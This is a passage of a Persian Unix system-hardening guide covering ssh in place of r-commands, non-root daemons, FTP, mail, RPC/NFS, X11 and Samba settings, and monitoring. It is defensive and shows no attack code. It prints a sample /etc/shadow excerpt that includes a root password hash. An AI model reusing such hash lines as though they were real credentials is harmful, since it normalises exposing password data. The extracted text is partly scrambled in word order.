ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑﺎ ﻛﻠﻴﺪﻫﺎﻱ ﻣﺸﺘﺮﮎ ﻳﺎ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ .ﺍﻣﺮﻭﺯﻩ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺯﻳـﺎﺩﻱ ﺭﺍ
ﻣﻲﺗﻮﺍﻥ ﻏﻴﺮﻓﻌﺎﻝ ﻛﺮﺩ ) (ftp ،rsh ،rcp ،rlogin ،telnetﺗﺎ ﺑﺠﺎﻱ ﻫﻤﺔ ﺁﻧﻬﺎ ﺍﺯ ﭘﻮﺳﺘﺔ ﺍﻣﻦ ) (sshﻛﻪ ﺩﺍﺭﺍﻱ ﻳﻚ ﻣﻜـﺎﻧﻴﺰﻡ ﻣـﺴﺘﺤﻜﻢ ﺑـﺮﺍﻱ
ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺳﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ .ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻴـﺪ ﻭ ﺩﺭ ﻓﺎﻳﻠﻬـﺎﻱ .rhostsﻳـﺎ /etc/hosts.equivﺗﻤـﺎﻡ ﺳـﻄﺮﻫﺎﻳﻲ ﺭﺍ ﻛـﻪ
ﺁﺩﺭﺳﻬﺎﻱ IPﻣﺎﺷﻴﻨﻬﺎﻱ ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﻛﻨﻨﺪ ﺣﺬﻑ ﻛﻨﻴـﺪ .ﺧـﺪﻣﺎﺕ ﺩﻳﮕـﺮ ) (ldap ،http ،imap ،popﺭﺍ ﺑـﺎ ﻛﺘﺎﺑﺨﺎﻧـﻪﻫـﺎﻱ
OpenSSLﻛﺎﻣﭙﺎﻳﻞ ﻛﻨﻴﺪ ﺗﺎ ﺍﺯ ﺍﺗﺼﺎﻻﺕ SSL/TLSﺑﺎ ﻣﺸﺘﺮﻳﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﺼﻮﺭﺕ ﺭﻣﺰﮔـﺬﺍﺭﻱﻧـﺸﺪﻩ
ﻓﺮﺳﺘﺎﺩﻩ ﻧﺸﻮﻧﺪ.
ﺩﺭ ﻣﻮﻗﻌﻴﺘﻬﺎﻳﻲ ﻛﻪ ﺍﻣﻜﺎﻥ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ،ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪﺍﻱ ﺭﺍ ﺗﺤﺖ ﺣﺴﺎﺏ ﮐﺎﺭﺑﺮﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻏﻴـﺮ rootﺍﺟـﺮﺍ ﻛﻨﻴـﺪDaemon .ﻫـﺎﻱ
ﺷﺒﻜﻪﺍﻱ ﺑﺴﻴﺎﺭﻱ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﻃﻮﺭﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﺮﺩ ﻛﻪ ﺍﺑﺘﺪﺍ ﺑﺎ rootﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺷﻮﻧﺪ )ﺗﺎ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﭘﻮﺭﺗﻲ ﭘـﺎﻳﻴﻨﺘﺮ ﺍﺯ bind ،١٠٢٤ﺷـﻮﻧﺪ ،ﭼـﻮﻥ
ﺍﻳﻨﻜﺎﺭ ﺩﺭ ﺍﻛﺜﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ Unixﻧﻴﺎﺯ ﺑﻪ ﺍﻣﺘﻴﺎﺯﺍﺕ rootﺩﺍﺭﺩ( ﻭ ﺳﭙﺲ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺑﺪﻫﻨﺪ ﻭ ﺗﺤﺖ ﺣﺴﺎﺏ ﮐﺎﺭﺑﺮﻱ ﻳﮏ ﻛﺎﺭﺑﺮ ﻏﻴﺮ ﺍﺯ
rootﺑﻪ ﻛﺎﺭ ﺧﻮﺩ ﺍﺩﺍﻣﻪ ﺩﻫﻨﺪ .ﺑﺠﺎﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﻨﻬﺎ ﻳﻚ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻣﺸﺘﺮﻙ ﺑﺮﺍﻱ deamonﻫﺎ ) ،(nobodyﺑـﻪ ﻫـﺮ daemon
ﻳﻚ ﺣﺴﺎﺏ ﻏﻴﺮ rootﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩﺵ ﺭﺍ ﺍﺧﺘﺼﺎﺹ ﺩﻫﻴﺪ .ﺍﮔﺮ ﺍﻣﻜﺎﻥ ﺁﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﺧـﺪﻣﺎﺕ ﺷـﺒﻜﻪﺍﻱ ﺭﺍ ﺩﺭ ﻣﺤـﻴﻂ chroot
ﻣﺤﺼﻮﺭ ﻛﻨﻴﺪ ﺗﺎ ﺩﺭﺻﻮﺭﺕ ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻥ ،ﺻﺪﻣﺎﺕ ﻭﺍﺭﺩﻩ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻩ ﺑﺎﺷﻴﺪ.
ﺍﮔﺮ ﺧﺪﻣﺎﺕ FTPﻧﺎﺷﻨﺎﺱ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻴﺪ ،ﺍﺯ ﻳﻚ ﻧﺴﺨﺔ ﺑﻪ ﺭﻭﺯ FTP daemonﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ .ﻓﺎﻳﻞ ﺍﺻﻠﻲ /etc/passwdﺧـﻮﺩ ﺭﺍ
ﺩﺭ ﻣﺤﺪﻭﺩﺓ FTPﻗﺮﺍﺭ ﻧﺪﻫﻴﺪ .ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﻓﺎﻳﻞ /etc/ftpusersﻓﻬﺮﺳﺖ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ FTPﻭﺻـﻞ
ﺷﻮﻧﺪ ﺷﺎﻣﻞ ﻛﺎﺭﺑﺮﺍﻧﻲ ﭼﻮﻥ bin ،uucp ،rootﻭ ﻫﺮ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺩﻳﮕﺮﻱ ﻛﻪ ﻣﺘﻌﻠﻖ ﺑﻪ ﻳﻚ ﺍﻧﺴﺎﻥ ﻭﺍﻗﻌﻲ ﻧﻴﺴﺖ ﻫﻢ ﺑﺎﺷﺪ .ﻧـﺴﺒﺖ
ﺑﻪ ﻣﺠﻮﺯﻫﺎ ﻭ ﻣﺎﻟﻜﻴﺖ ﺷﺎﺧﻪﻫﺎﻱ ﺩﺭﻭﻥ ﻣﺤﺪﻭﺩﺓ FTPﻫﻤﻮﺍﺭﻩ ﻫﻮﺷﻴﺎﺭ ﺑﺎﺷﻴﺪ .ﺷﺎﺧﻪﻫـﺎﻱ ﻭﺭﻭﺩﻱ ﺭﺍ ﻃـﻮﺭﻱ ﺗﻨﻈـﻴﻢ ﻛﻨﻴـﺪ ﻛـﻪ ﺍﺟـﺎﺯﺓ
downloadﻧﺪﻫﻨﺪ ﻭ ﺷﺎﺧﻪﻫﺎﻱ ﺧﺮﻭﺟﻲ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﻨﻴﺪ ﻛﻪ ﻣﺎﻧﻊ uploadﺷﻮﻧﺪ ،ﻭ ﺛﺒﺘﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ FTPﺭﺍ ﻧﻴﺰ ﺑﻄﻮﺭ
ﻣﻨﻈﻢ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ.
ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﺑﻪ ﺟﺎﻱ sendmailﺍﺯ ،exim ،postfixﻳﺎ qmailﺑﻌﻨﻮﺍﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ .ﻫـﻴﭻ
ﻭﻳﺮﺍﻳﺸﻲ ﺍﺯ ﺑﺮﻧﺎﻣﺔ MTAﺧﻮﺩ ﺟﺰ ﺁﺧﺮﻳﻦ ﻭﻳﺮﺍﻳﺶ ﺁﻧﺮﺍ ﺑﻜﺎﺭ ﻧﺒﺮﻳﺪ .ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻨﻜﻪ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﮑﺘﺮﻭﻧﻴﮑﻲ ﻣﺮﺑﻮﻁ ﺑـﻪ ﺣـﺴﺎﺑﻬﺎﻱ
ﻣﺠﺎﺯ ﻏﻴﺮﻛﺎﺭﺑﺮﻱ ﺑﻪ ﻳﻚ ﻛﺎﺭﺑﺮ ﻭﺍﻗﻌﻲ ﺗﺤﻮﻳﻞ ﻣﻲﺷﻮﻧﺪ ﺍﺯ ""mail aliasﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ؛ ﺑﻌﺒﺎﺭﺕ ﺩﻳﮕﺮ ﺍﺯ ﺗﺤﻮﻳﻞ ﻧﺎﻣﻪﻫﺎ ﺑﻪ ﺁﺩﺭﺳـﻬﺎﻱ
postmaster ،rootﻭ abuseﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ .ﺍﺯ ﺍﻳﺠﺎﺩ ﺗﻐﻴﻴـﺮﺍﺕ ﺩﺭ ﻓﺎﻳـﻞ ﻣﺮﺑـﻮﻁ ﺑـﻪ ""mail aliasﻫـﺎ ﺗﻮﺳـﻂ ﺍﻓـﺮﺍﺩ ﻏﻴﺮﻣﺠـﺎﺯ
ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﺪ .ﺍﮔﺮ ""mail aliasﻫﺎﻳﻲ ﺩﺍﺭﻳﺪ ﻛﻪ ﻧﺎﻣﻪﻫﺎ ﺭﺍ ﺑﻪ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻳﺎ ﻓﺎﻳﻠﻬﺎ ﻣﻲﺭﺳﺎﻧﻨﺪ ،ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﺩﻗﺖ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗـﺮﺍﺭ ﺩﻫﻴـﺪ ﻭ
ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﺁﻧﻬﺎ ﺭﺍ ﺣﺬﻑ ﻛﻨﻴﺪ.
ﺍﮔﺮ ﻣﺎﺷﻴﻨﻬﺎﻱ ﭼﻨﺪﻛﺎﺭﺑﺮﻩ ﺩﺍﺭﻳﺪ ،ﺣﺘﻤﹰﺎ ﺭﻭﻱ ﺁﻥ deamonﻫﺎﻱ authdﻭ identdﺭﺍ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻭﺭﻳﺪ .ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻭﻗﺘﻲ ﻣﻔﻴﺪ ﺍﺳـﺖ
ﻛﻪ ﮔﺰﺍﺭﺷﻲ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻴﺪ ﻣﺒﻨﻲ ﺑﺮ ﺍﻳﻨﻜﻪ ﻛﺴﻲ ﺑﺎ ﻭﺍﺳﻄﻪ ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻤﺎ ﺑﻪ ﺳﻴﺴﺘﻢ ﺩﻳﮕﺮﻱ ﺣﻤﻠﻪ ﻛﺮﺩﻩ ﺍﺳـﺖ .ﻧـﺴﺨﻪ-
ﻫﺎﻳﻲ ﺭﺍ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﻛﻪ ﻣﺸﺨﺼﻪﻫﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺑﺎﺯ ﻣﻲﮔﺮﺩﺍﻧﻨﺪ ﺗﺎ ﺍﺯ ﺍﻓـﺸﺎﻱ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﺭﺑﺮﺍﻥ ﺧـﻮﺩ ﺑـﻪ ﺧـﺎﺭﺝ ﺍﺯ
ﺳﻴﺴﺘﻢ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ.
ﺍﮔﺮ ﺍﺯ RPCﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻛﻨﻴﺪ portmapper daemonﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ ،ﻭ ﺍﮔﺮ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺁﻧـﺮﺍ ﻣﺤـﺪﻭﺩ
ﻧﻤﺎﻳﻴﺪ ﻭ ﻗﺎﺑﻠﻴﺖ securenetsﺭﺍ ﺩﺭﺻﻮﺭﺕ ﻭﺟﻮﺩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﻫﺮ ﺳﺮﻭﻳﺲ RPCﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺗﻮﺳﻂ inetdﻛـﻪ ﺍﺳـﺘﻔﺎﺩﻩ
ﻧﻤﻲﻛﻨﻴﺪ )ﻭ ﻣﺨﺼﻮﺻﹰﺎ (rexdﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ .ﺍﮔﺮ Secure RPCﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ .ﺗﻨﻬـﺎ ﺗﻜﻴـﻪﮔـﺎﻩ
ﻣﻌﻘﻮﻝ ﺑﺮﺍﻱ NIS+ﻭ Secure RPC ،NFSﻣﻲﺑﺎﺷﺪ .ﺍﺯ ﺑﻜﺎﺭﮔﻴﺮﻱ NISﻳﺎ NIS+ﺩﺭ ﺣﺎﻟﺖ ﺳﺎﺯﮔﺎﺭﻱ ٣٥٠ﺍﺟﺘﻨﺎﺏ ﻛﻨﻴﺪ .ﺩﺭﺻﻮﺭﺕ
ﻧﻴﺎﺯ ﺑﻪ NFSﺍﺯ ﻭﻳﺮﺍﻳﺶ ٣ﺁﻥ ﺩﺭ ﺣﺎﻟﺖ TCPﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻭ ﺗﻌﺪﺍﺩ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻓﺎﻳﻠﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻥ ﺻﺎﺩﺭ ﻛﺮﺩ ﻭ ﻣﺠﻤﻮﻋﺔ ﻣﻴﺰﺑﺎﻧﻬـﺎﻳﻲ
ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺁﻧﻬﺎ ﺭﺍ mountﻛﻨﻨﺪ ﺭﺍ ﻣﺤﺪﻭﺩ ﻧﻤﺎﻳﻴﺪ .ﺳﻌﻲ ﻛﻨﻴﺪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻓﺎﻳﻞ ﺭﺍ ﺑﺼﻮﺭﺕ ﻓﻘﻂ ﺧﻮﺍﻧﺪﻧﻲ ﺻﺎﺩﺭ ﻛﻨﻴـﺪ NFS .ﺍﺟـﺎﺯﻩ
ﻧﻤﻲﺩﻫﺪ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﻣﺎﻟﻜﺸﺎﻥ rootﺍﺳﺖ ﺗﻮﺳﻂ rootﻣﺎﺷﻴﻦ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺗﻐﻴﻴﺮ ﻛﻨﻨﺪ ،ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﺻﺮﻳﺤﹰﺎ ﺧﻼﻑ ﺁﻧﺮﺍ ﺫﻛـﺮ ﻛـﺮﺩﻩ
ﺑﺎﺷﻴﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﻬﺘﺮ ﺍﺳﺖ ﺣﺴﺎﺏ ﮐﺎﺭﺑﺮﻱ ﻛﺎﺭﺑﺮ rootﻣﺎﻟﻚ ﺗﻤﺎﻡ ﻓﺎﻳﻠﻬﺎ ﻭ ﺷﺎﺧﻪﻫﺎﻱ ﺻﺎﺩﺭﺷﺪﻩ ﺑﺎﺷﺪ ﻭ ﻧـﻪ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ ﺩﻳﮕـﺮﻱ
)ﻣﺎﻧﻨﺪ (binﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﻤﻨﺎﻡ ﺁﻥ ﺭﻭﻱ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﺩﺭﺻﻮﺭﺕ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ،X11ﻗﻮﻳﺘﺮﻳﻦ ﻣﻜـﺎﻧﻴﺰﻡ ﻣﻤﻜـﻦ ﺑـﺮﺍﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﺭﺍ ﺑﻜـﺎﺭ ﺑﮕﻴﺮﻳـﺪ Kerberos .ﻳـﺎ ""Secure RPC
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺴﺘﺤﻜﻤﻲ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻫﺴﺘﻨﺪ ﻭ " "Magic Cookiesﺿﻌﻴﻔﺘﺮ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺖ ،ﻭ ﺑﺮﻧﺎﻣـﺔ xhostﻧﻴـﺰ ﺍﺯ ﻛﻤﺘـﺮﻳﻦ
ﺣﺪ ﺍﻣﻨﻴﺖ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ .ﺗﻮﻧﻞﺯﺩﻥ ﺍﺗﺼﺎﻻﺕ X11ﺍﺯ ﻃﺮﻳﻖ SSHﻧﻴﺰ ﻣﺤﺎﻓﻈﺖ ﺧﻮﺑﻲ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ.
ﺍﮔﺮ ﺳﺮﻭﻳﺲ SMBﺭﺍ ﺍﺯ ﻃﺮﻳﻖ Sambaﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻴﺪ ،ﺍﻣﻨﻴﺖ "ﻛﺎﺭﺑﺮ" ﻳﺎ "ﺩﺍﻣﻨﻪ" ﺭﺍ ﺑﺮ ﺍﻣﻨﻴﺖ "ﺍﺷﺘﺮﺍﻙ" ﺍﻭﻟﻮﻳﺖ ﺩﻫﻴﺪ .ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ
ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﻓﻌﺎﻝ ﻛﻨﻴﺪ ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻗﺎﺑﻠﻴﺖ " "min protocolﺩﺭ Sambaﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﺭﺍ ﻣﺠﺒﻮﺭ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﺧـﺮﻳﻦ
ﻭﻳﺮﺍﻳﺶ ﭘﺮﻭﺗﻜﻞ SMBﻧﻤﺎﻳﻴﺪ .ﺍﺯ ﮔﺰﻳﻨﺔ " "admin userﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ ﻭ ﻳﺎ ﺍﮔﺮ ﻫﻢ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﻣـﻲﻛﻨﻴـﺪ ،ﺑﻴـﺖ ﺁﺭﺷـﻴﻮ DOSﺭﺍ ﺑـﻪ
"ﻗﺎﺑﻞ ﺍﺟﺮﺍ" )ﺩﺭ (Unixﺗﺒﺪﻳﻞ ﻧﻤﺎﻳﻴﺪ .ﻧﺤﻮﺓ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﮔﺰﻳﻨﺔ " "veto filesﺭﺍ ﻧﻴﺰ ﺑﻴﺎﻣﻮﺯﻳﺪ.
ﭼﺸﻢ ﺍﺯ ﺷﺒﻜﺔ ﺧﻮﺩ ﺑﺮ ﻧﺪﺍﺭﻳﺪ .ﺧﺮﻭﺟﻴﻬﺎﻱ netstatﻭ lsofﺭﺍ ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﺗﺎ ﺑﺒﻴﻨﻴﺪ ﭼﻪ ﺍﺗﺼﺎﻻﺕ ﺷﺒﻜﻪﺍﻱ ﺍﺯ ﻭ ﺑﻪ ﺳﻴﺴﺘﻢ
ﺷﻤﺎ ﺍﻳﺠﺎﺩ ﺷﺪﻩ ﺍﺳﺖ .ﺍﺯ whoﻭ lastﺑﺮﺍﻱ ﺩﻳﺪﻥ ﺍﺗﺼﺎﻻﺕ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ .ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ISS ،Nessus ،nmapﻭ ﺳـﺎﻳﺮ
ﭘﻮﻳﺸﮕﺮﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ،ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺑﻴﺮﻭﻥ ﻛﺎﻭﺵ ﻛﻨﻴﺪ ﺗﺎ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﺣﺘﻤﺎﻟﻲ ﻛﻪ ﺑﺎﻳﺪ ﺍﺻﻼﺡ ﺷﻮﻧﺪ ﺭﺍ ﭘﻴﺪﺍ ﻛﻨﻴـﺪ .ﺷـﺎﻳﺪ
ﺑﻬﺘﺮﻳﻦ ﻛﺎﺭ ﺑﺮﺍﻱ ﺑﻌﻀﻲ ﻣﺎﺷﻴﻨﻬﺎ ﺟﺪﺍﺳﺎﺯﻱ ﻛﺎﻣﻞ ﺁﻧﻬﺎ ﺍﺯ ﺷﺒﻜﻪ ﺑﺎﺷﺪ.
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ Unixﺧﻮﺩ ﺩﺍﺭﺍﻱ ﺗﻌﺪﺍﺩﻱ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺑﺮﺍﻱ ﺟﺪﺍﺳﺎﺯﻱ ﺍﻣﺘﻴﺎﺯﺍﺕ ﻣﺎﻟﻜﻴﺖ ﻓﺎﻳﻞ ﻭ ﭘـﺮﺩﺍﺯﻩ ﻣـﻲﺑﺎﺷـﻨﺪ ،ﻣﺎﻧﻨـﺪ
daemonﻫﺎﻱ ،uucp ،binﻭ ﻏﻴﺮﻩ .ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﮐﻨﻴﺪ ﻛﻪ ﻗﺴﻤﺖ ﻣﺮﺑﻮﻁ ﺑﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﻣﺰﺷﺪﻩ ﺑﺮﺍﻱ ﺗﻤﺎﻡ ﺍﻳـﻦ ﺣـﺴﺎﺑﻬﺎ ﺑـﺎ
ﻼ ﻗﻄﻌﻪﺍﻱ ﺍﺯ ﻳﻚ ﻓﺎﻳـﻞ /etc/shadowﺭﺍ ﻛﺎﺭﺍﻛﺘﺮ "*" ﺷﺮﻭﻉ ﺷﺪﻩ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺁﻧﻬﺎ ﺑﺎ ﻫﻴﭻ ﺭﻣﺰ ﻋﺒﻮﺭﻱ ﻣﻤﻜﻦ ﻧﻴﺴﺖ .ﺫﻳ ﹰ
ﻣﻲﺑﻴﻨﻴﺪ:
root:$1$24g7KF8j$Rjky384Fd1PvtSCOJ/WW.1:12264:0:99999:7:::134551156
bin: *:10890:0:99999:7:::
daemon:*:10890:0:99999:7:::
adm:*:10890:0:99999:7:::
lp:*:10890:0:99999:7:::
sync:*:10890:0:99999:7:::
shutdown:*:10890:0:99999:7:::
halt:*:10890:0:99999:7:::
)ﻫﺮﭼﻨـﺪ root ﺩﺭ ﺍﻳﻦ ﻣﺜﺎﻝ ﺗﻨﻬﺎ ﺣﺴﺎﺏ rootﺩﺍﺭﺍﻱ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﻌﺘﺒﺮ ﻣﻲﺑﺎﺷﺪ ﻭ ﻫﻴﭻ ﻛﺲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺣﺴﺎﺑﻬﺎﻱ ﺩﻳﮕـﺮ ﻭﺍﺭﺩ ﺷـﻮﺩ
ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭﺻﻮﺭﺕ ﻧﻴﺎﺯ ﺑﺎ ﺩﺳﺘﻮﺭ suﺍﻣﺘﻴﺎﺯﺍﺕ ﺁﻧﻬﺎ ﺭﺍ ﺍﺧﺘﻴﺎﺭ ﻛﻨﺪ( .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﻃﻮﺭﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﺮﺩ ﻛﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻌﺪ ﺍﺯ
ﻣﺪﺕ ﺯﻣﺎﻥ ﻣﺸﺨﺼﻲ ﻣﻨﻘﻀﻲ ﺷﻮﻧﺪ ﺗﺎ ﺩﺭ ﻣﻘﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﺓ ﻫﻤﻴﺸﮕﻲ ﻳـﻚ ﻣﻬـﺎﺟﻢ ﺍﺯ ﻳـﻚ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ ﺑـﺪﻭﻥ ﺁﮔـﺎﻫﻲ ﻣﺎﻟـﻚ ﺁﻥ
ﻣﺤﺎﻓﻈﺖ ﺍﻳﺠﺎﺩ ﺷﻮﺩ .ﺑﺮﺍﻱ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺧﻮﺩ ﻃﻮﻝ ﻋﻤﺮﻱ ﻣﻴﺎﻥ ﻳﻚ ﺗﺎ ﺷﺶ ﻣﺎﻩ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴﺪ .ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎ ﻣـﻲﺗﻮﺍﻧﻴـﺪ
ﺍﻟﺰﺍﻡ ﻛﻨﻴﺪ ﻛﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺍﺯ ﺷﺮﺍﻳﻂ ﺧﺎﺻﻲ )ﺍﺯ ﻧﻈﺮ ﻃﻮﻝ ،ﺗﻨﻮﻉ ﻛﺎﺭﺍﻛﺘﺮﻫﺎ ،ﻭ ﻏﻴﺮﻩ( ﺗﺒﻌﻴﺖ ﻛﻨﻨﺪ .ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴـﺖ ﭘـﺸﺘﻴﺒﺎﻧﻲ
ﻻ ﺍﺯ ﻃﺮﻳﻖ PAMﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﻫﺴﺘﻨﺪ. ﻣﻲﻛﻨﻨﺪ ﻣﻌﻤﻮ ﹰ
